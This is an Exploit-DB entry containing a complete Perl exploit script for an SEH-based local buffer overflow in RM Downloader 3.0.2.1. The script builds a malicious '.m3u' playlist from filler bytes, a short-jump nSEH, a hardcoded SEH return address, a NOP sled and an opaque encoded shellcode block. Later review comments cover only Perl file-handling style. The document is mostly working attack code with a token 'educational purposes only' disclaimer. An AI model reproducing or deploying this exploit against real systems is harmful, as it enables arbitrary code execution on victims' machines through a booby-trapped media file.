RM Downloader – ‘.m3u’ Local Buffer Overflow (SEH)

  • 作者: jacky
    日期: 2010-01-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11202/
  • #!/usr/bin/perl -w
    # Author: Jacky
    # Version: 3.0.2.1
    # Tested on: Windows XP SP2
    
    #RM Downloader m3u Buffer Overflow (SEH) (Perl Edition )
    #Discovered by ::> Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-)
    #Written by Jacky
    #All Greetz for Peter Van Eeckhoutte and Corelan Team !!!
    #I tried to exploit it via a direct RET overwrite, but on my system it doesn't seem to be a direct
    #RET vulnerability, so I tried SEH instead and voilà!
    #THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!
    
    # Output path: a bare relative filename, so the file is written into
    # whatever the current working directory is when the script runs.
    my $file="RM.m3u";
    # Fixed-length filler; the count is the value given on the page.
    my $junk="A"x35059;
    # The next two values are reproduced verbatim from the page. The second is
    # a build-specific address (see the author's notes below) and is not
    # portable across versions or systems.
    my $nseh="\xeb\x1e\x90\x90";
    my $seh="\x1F\xEA\x02\x10"; # 0x1002EA1F::> Thanks for Peter who gave me this
    #address and it worked Perfectly ;-)
    #This Address works too ::> 0x01DD1111
    my $nops="\x90"x25;
    # Opaque byte string taken from the page and kept byte-for-byte; nothing in
    # this script validates its length or content.
    my $esp="\xbf\x1b\xaf\xd9\xd2\x2b\xc9\xb1\x24\xdb\xda\xd9\x74\x24\xf4\x5b".
    "\x31\x7b\x0e\x83\xeb\xfc\x03\x60\xa5\x3b\x27\x6a\x51\xff\xc8\x92".
    "\xa2\x8b\x8c\xae\x29\xf7\x0b\xb6\x2c\xe7\x9f\x09\x37\x7c\xc0\xb5".
    "\x46\x69\xb6\x3e\x7c\xe6\x48\xae\x4c\x38\xd3\x82\x2b\x78\x90\xdd".
    "\xf2\xb3\x54\xe0\x36\xa8\x93\xd9\xe2\x0b\x58\x68\xee\xdf\x3f\xb6".
    "\xf1\x34\xd9\x3d\xfd\x81\xad\x1e\xe2\x14\x59\x2b\x06\x9c\x9c\xc0".
    "\xbe\xfe\xba\x12\x02\xcf\x02\x7e\x0f\x70\xb3\xfb\xcf\x09\xbf\x88".
    "\x90\xe5\x34\xfe\x0c\x5b\xc1\x96\x24\x48\xdf\xed\xb5\x3e\xe0\xf1".
    "\xb5\xb5\x89\xcd\xea\xf8\xbf\x4d\x43\x72\xc7\x0e\xab\xff\x68\x78".
    "\xdc\x8a\x8d\x27\x74\x13\x73\x5d\x8a\x74\x73\x86\xf0\x1b\xe7\x2b".
    "\xd9\xbe\x8f\xce\x25";
    
    # Trailing filler; again a fixed count from the page.
    my $junk2="A"x5000;
    # The pieces are simply concatenated in the order they were declared.
    my $payload=$junk.$nseh.$seh.$nops.$esp.$junk2;
    
    
    # NOTE(review): two-arg open on a bareword handle with the mode folded into
    # the filename string, and no `or die` — a failed open is not fatal, so the
    # script carries on and still prints the success messages below. The safe
    # idiom is the three-arg form with a lexical handle and an error check:
    #   open my $fh, '>', $file or die "open $file: $!";
    open(INI,">$file");
    print INI $payload;
    # These messages are printed before close() runs, and close() is unchecked,
    # so a buffered write error (e.g. disk full) would never be reported. The
    # shebang enables -w, but there is no `use strict` in this file.
    print "[+]File Created Successfully!\n";
    print "[+]Done!\n";
    close(INI);